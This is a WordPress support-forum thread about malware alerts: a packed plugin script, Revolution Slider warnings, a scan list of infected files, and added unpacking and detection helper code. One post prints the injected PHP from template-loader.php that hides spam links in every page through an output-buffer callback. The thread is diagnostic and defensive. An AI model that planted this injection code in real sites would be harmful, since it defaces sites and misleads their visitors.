When scanning my site, Quttera says that the file wp-ui.js is potentially suspicious. I just downloaded the file and uploaded it fresh and get the same results from the scan.
Any advice?
Thanks,
Amy
WP UI - Tabs, Accordions, Sliders
The scanner is probably just alerting on eval(function(p,a,c,k,e,r)
The file has compressed content. The packer has legitimate uses, but it's also sometimes used to hide malware.
Here's the decompressed content if you would like to take a look through it. http://pastebin.com/Cz0tN78z
[edit] ..I have no affiliation with the plugin. :-)
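A scanner hit on this wrapper can be triaged offline without executing the file. The sketch below is an added example, not part of the thread or the plugin: it decodes a p,a,c,k,e,r payload statically (no eval) and lists URLs and calls worth reading. SAMPLE is constructed and the function names are hypothetical.

```javascript
// Static unpacker for "eval(function(p,a,c,k,e,r)" output; never calls eval().
// Index encoding used by the packer: 0-9, a-z, then A-Z when radix > 36.
function encodeIndex(n, radix) {
  const head = n < radix ? '' : encodeIndex(Math.floor(n / radix), radix);
  const d = n % radix;
  return head + (d > 35 ? String.fromCharCode(d + 29) : d.toString(36));
}

// Argument list of the wrapper: ('payload',radix,count,'w0|w1|...'.split('|')
const PACKED_ARGS =
  /\}\s*\(\s*'((?:[^'\\]|\\.)*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)/;

function unpack(source) {
  if (!/eval\(function\(p,a,c,k,e,[rd]\)/.test(source)) return null;
  const m = PACKED_ARGS.exec(source);
  if (!m) return null;
  const unquote = s => s.replace(/\\(.)/g, '$1'); // undo \' and \\ escaping
  const radix = Number(m[2]), count = Number(m[3]);
  const words = unquote(m[4]).split('|');
  const table = new Map();
  for (let i = 0; i < count; i++) {
    const key = encodeIndex(i, radix);
    table.set(key, words[i] || key); // empty slot: the token stands for itself
  }
  return unquote(m[1]).replace(/\b\w+\b/g, tok => (table.has(tok) ? table.get(tok) : tok));
}

// Summarise what a reviewer should read first in the unpacked code.
function triage(source) {
  const code = unpack(source);
  if (code === null) return { packed: false, code: null, urls: [], flags: [] };
  const urls = code.match(/https?:\/\/[^\s'"<>)]+/g) || [];
  const flags = ['eval(', 'document.write(', 'fromCharCode(', '<iframe']
    .filter(s => code.includes(s));
  return { packed: true, code, urls, flags };
}

// Constructed sample (decoder body elided; the static unpacker does not need it).
const SAMPLE = `eval(function(p,a,c,k,e,r){/* decoder body elided */}('0("#1").1()',62,2,'jQuery|tabs'.split('|'),0,{}))`;
console.log(triage(SAMPLE));
```

An empty `urls` and `flags` result does not prove a file is clean; it only means the unpacked code is now readable and can be compared against the plugin's published copy.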
Thank you for responding. I wasn't sure why it was saying this was suspicious. You have cleared that up for me.
You're welcome!
I have a problem with my site. It has been hacked several times now, and I always restored my last backup, which is supposed to be clean (at least all tools like Sucuri and others say so).
After a few days or weeks it is hacked again. Google Webmaster Tools tells me there is malware in the URL:
Malware-Code eingeschleust,http://www.unixhelpdesk.de/,24.01.14,"""
[Code moderated. Please do not post potential hack code blocks in the forums. Please use the pastebin]
O.K., I see this is an encrypted URL and the date of infection is always part of the URL (http://www.unixhelpdesk.de/,24.01.14). But I have not been able to get rid of it for a long time. The site will be infected again if I restore it from backup. I changed the password etc. and cannot find the reason...
Has anybody seen this exact problem and found a solution?
I just had two sites come back with suspected malware from Revolution Slider files.
revslider/rs-plugin/css/settings.css
revslider/revslider.php
revslider/inc_php/revslider_globals.class.php
Are these false positives or should I be concerned about finding another plugin?
Scanned both sites with Sucuri and found nothing.
Just noticed that Chrome is blocking the plugin page for Revolution Slider on Code Canyon too. That can't be good.
public_html/wp-content/plugins/revslider/inc_php/revslider_globals.class.php
public_html/wp-content/plugins/revslider/revslider.php
public_html/wp-content/plugins/revslider/rs-plugin/css/settings.css
public_html/wp-content/plugins/revslider/views/templates/sliders.php
I'm using a paid theme (that includes the Revolution Slider). Could anyone confirm whether those alerts are false positives?
Just came here looking for the same thing, also getting malware warnings from WF on revolution :(
Looks like:
www dot themepunch dot com/codecanyon/revolution_wp/
is the culprit? Not sure why their site was flagged by Google, it may have gotten hacked.
The reason Sucuri didn't find anything is because they can't scan your PHP source code with a remote scan like Wordfence does.
You can either remove the slider or wait this out until the site is fixed and marked clean by Google. Keep in mind that if that URL is indexable by Google's crawlers you may incur an SEO penalty.
Regards,
Mark.
So just to be clear, this is not a false positive from Wordfence since Google has in fact flagged the URL as malware.
Regards,
Mark.
I got the warning this morning on 3 of my sites. I am using Wordfence. You mention above to remove the slider - does that mean deleting the plugin - or just remove the slider from the site pages?
Thanks,
I meant delete the plugin. But before you do that please contact the plugin author for more info. They can probably explain why their site has been flagged and you can probably ignore that warning.
Regards,
Mark.
I have the same warning on http://www.mindfulnessdublin.com. Does anyone have more information?
* File contains suspected malware URL: wp-content/plugins/revslider/inc_php/revslider_globals.class.php
* File contains suspected malware URL: wp-content/plugins/revslider/revslider.php
* File contains suspected malware URL: wp-content/plugins/revslider/rs-plugin/css/settings.css
* File contains suspected malware URL: wp-content/plugins/revslider/views/templates/sliders.php
This is what Themepunch are saying in case anyone else has this problem.
Hi,
Thanks a lot for your question.
First of all I want to say again, everything is safe and clean. You don't need to update the plugin or worry about any malware or similar viruses or trojans.
None of our plugins or themes was influenced at any time, and all items and downloadable files are, were and will be clean!
Some background information:
We transferred some of our webservers and domains to a new and better provider tonight, and during this transfer we were attacked. Some of our demo content has been influenced.
We fixed the issue in a very short time, however Google blocked us without any real reason. Google just unlocked the sites, and also declared all our content clean and safe.
Thanks a lot again and have a great day, and please do not hesitate to contact us any time if you have further questions.
Cheers,
Your ThemePunch
Thanks for the information Mark and Badex, I was about to write to Themepunch, so it seems we'll just have to wait till Google unflags Themepunch.... (I hope)
Are you using my anti-malware plugin on this site?
If so, have you downloaded the latest definition update and then ran a Complete Scan of the whole site?
If so, What does it find? If no known threats what potential threats are found?
Is this a shared hosting environment? How many other sites do you have on this server? Have you checked all the other sites with my plugin too?
If you can answer all these questions I can offer more help...
Aloha, Eli
I'm not sure where this problem came from, but so far I've seen no other information on it (Google is my friend). So, I'm hoping this will help someone else with the same problem.
In a relatively new WordPress site, I found there was a large white space at the bottom of my pages which was caused by a series of <div>, <a> and <br> tags somehow inserted after the footer content. There was a bunch of positioning so all the divs were out of sight above the page, but the break tags littered the visible area. The anchors were to a variety of Viagra and other medication ads. I'm guessing these are simply links to improve search engine ratings, or to generate ad revenue for simply showing them to you (but they aren't actually visible).
The hack was in /wp-includes/template-loader.php
Where the file normally ends with these lines:
...
    if ( $template = apply_filters( 'template_include', $template ) )
        include( $template );
    return;
endif;
I found a much different block:
if ( $template = apply_filters( 'template_include', $template ) )
/*mx_start*/{ function mx_callback($mx_body) {
    $mx_links = array( /*... LONG list of HTML blocks removed ...*/ );
    $mx_diapasone = "40-50";
    if(strstr($mx_diapasone, "-"))
    {
        $diaps = explode("-", $mx_diapasone);
        $need = rand($diaps[0], $diaps[1]);
    }else{
        $need = $mx_diapasone;
    }
    $mx_links = array_slice($mx_links, 0, $need);
    $mx_rules = array("<body>*", "*</body>");
    function mx_insert($mx_body, $mx_rules, $mx_data)
    {
        foreach($mx_rules as $rule)
        {
            $no_star = str_replace('*', '', $rule);
            if(stristr($mx_body, $no_star))
            {
                $new = (substr($rule, 0, 1) == "*")? $mx_data . $no_star : $no_star. $mx_data;
                $patt = '#' . preg_quote($no_star) . '#i';
                $mx_body = preg_replace($patt, $new, $mx_body, 1);
                break;
            }
        }
        return $mx_body;
    }
    $mx_body = mx_insert($mx_body, $mx_rules, implode("<br />", $mx_links));
    return $mx_body; }
ob_start("mx_callback");include( $template );
ob_end_flush(); }/*mx_end*/ /*mx_orig_startinclude( $template ); mx_orig_end*/
return;
endif;
The code appears to take a slice from the list of ads in mx_links and insert them into the page, with only the odd white space as a symptom.
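The injected block above is bracketed by `/*mx_start*/` and `/*mx_end*/`, and the original statement is stashed in a `/*mx_orig_start ... mx_orig_end*/` comment, so both detection and a candidate restore can key on those markers. This is an added example, not code from the post: `inspectMx` is a hypothetical helper and `MX_SAMPLE` is a constructed, shortened copy of the infected file tail.

```javascript
// Markers copied from the injected block shown in the post above.
const MX_INJECTED = /\/\*mx_start\*\/[\s\S]*?\/\*mx_end\*\//g;
const MX_ORIGINAL = /\/\*mx_orig_start([\s\S]*?)mx_orig_end\*\//g;

// Reports whether the markers are present and builds a candidate restored
// source: the injected span is dropped and the stashed original re-enabled.
function inspectMx(php) {
  const injected = php.match(MX_INJECTED) || [];
  const stashed = php.match(MX_ORIGINAL) || [];
  if (injected.length === 0 && stashed.length === 0) {
    return { infected: false, usesOutputBuffer: false, restored: php };
  }
  const restored = php
    .replace(MX_INJECTED, '')
    .replace(MX_ORIGINAL, (_, orig) => orig);
  // The page rewrite in the post is done through an ob_start() callback.
  const usesOutputBuffer = injected.some(block => /ob_start\s*\(/.test(block));
  return { infected: true, usesOutputBuffer, restored };
}

// Constructed sample: tail of template-loader.php with the payload body elided.
const MX_SAMPLE = `if ( $template = apply_filters( 'template_include', $template ) )
/*mx_start*/{ function mx_callback($mx_body) { /* payload elided */ return $mx_body; }
ob_start("mx_callback");include( $template );
ob_end_flush(); }/*mx_end*/ /*mx_orig_startinclude( $template ); mx_orig_end*/
return;
endif;`;

console.log(inspectMx(MX_SAMPLE));
```

Treat `restored` as a diff aid only: a core file such as template-loader.php is best replaced from a clean download of the same WordPress version, and the marker search is worth running over every PHP file in the install.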
Hi, our website is hosted at NetFirms, and our website has been hacked - Viagra commercials. I am a novice and am not sure I can fix this myself. Netfirms did a scan and found 14 files that have been infected with malware. They suggested I delete the infected files (I have no idea how to do that) and purchase SiteLock Premium to clean and protect my site at http://www.vermilionriverstewards.ca. We are a not-for-profit and have a very limited budget, so I'm wondering if there is anyone out there who can help me.
The infected files:
/home/users/web/b2731/nf.vermilionriverstewards/public_html/vermilionriverstewards.ca/configweb/config.root: SiteLock-PHP-CPANEL-b.UNOFFICIAL FOUND
/home/users/web/b2731/nf.vermilionriverstewards/public_html/vermilionriverstewards.ca/configweb/.htaccess: EIG.Hacktool.HTAccess.Root-1.UNOFFICIAL FOUND
/home/users/web/b2731/nf.vermilionriverstewards/public_html/vermilionriverstewards.ca/wp-rss3.php: SiteLock-PHP-INJECTOR-1.UNOFFICIAL FOUND
/home/users/web/b2731/nf.vermilionriverstewards/public_html/vermilionriverstewards.ca/wp-content/themes/purevision/functions.php: LONGDEF.PHP.Spam-Links-009N.UNOFFICIAL FOUND
/home/users/web/b2731/nf.vermilionriverstewards/public_html/vermilionriverstewards.ca/wp-content/themes/purevision/scripts/admin/uploadify/Shell.php: SiteLock-PHP-BACKDOOR-GENERIC-md5-to.UNOFFICIAL FOUND
/home/users/web/b2731/nf.vermilionriverstewards/public_html/vermilionriverstewards.ca/wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php: EIG.Hacktool.Deface.Tag-63.UNOFFICIAL FOUND
/home/users/web/b2731/nf.vermilionriverstewards/public_html/vermilionriverstewards.ca/wp-content/themes/purevision/scripts/DD_belatedPNG_0.0.8a-min.php: JCDEF.PHP.INJECTOR-01N.UNOFFICIAL FOUND
/home/users/web/b2731/nf.vermilionriverstewards/public_html/vermilionriverstewards.ca/wp-content/themes/purevision/scripts/timthumb.renamed.txt: EIG.PHP.TimThumb-108.UNOFFICIAL FOUND
/home/users/web/b2731/nf.vermilionriverstewards/public_html/vermilionriverstewards.ca/wp-content/plugins/weather-de.php: SiteLock-PHP-MINISHELL-1-g.UNOFFICIAL FOUND
/home/users/web/b2731/nf.vermilionriverstewards/public_html/vermilionriverstewards.ca/wp-content/uploads/2011/03/purevision.zip: EIG.PHP.TimThumb-108.UNOFFICIAL FOUND
/home/users/web/b2731/nf.vermilionriverstewards/public_html/vermilionriverstewards.ca/chpass.sh: SiteLock-PHP-BACKDOOR-GENERIC-md5-qr.UNOFFICIAL FOUND
/home/users/web/b2731/nf.vermilionriverstewards/public_html/vermilionriverstewards.ca/sym/.htaccess: EIG.Hacktool.HTAccess.DirIndex-1.UNOFFICIAL FOUND
/home/users/web/b2731/nf.vermilionriverstewards/public_html/vermilionriverstewards.ca/index.htm: SiteLock-JS-SEOSPAM-g.UNOFFICIAL FOUND
/home/users/web/b2731/nf.vermilionriverstewards/public_html/vermilionriverstewards.ca/groupx.php: SiteLock-PHP-BACKDOOR-GENERIC-md5-n.UNOFFICIAL FOUND
----------- SCAN SUMMARY -----------
Known viruses: 4389639
Engine version: 0.96.3
Scanned directories: 554
Scanned files: 4939
Infected files: 14
Data scanned: 1346.86 MB
Data read: 1532.18 MB (ratio 0.88:1)
Time: 624.750 sec (10 m 24 s)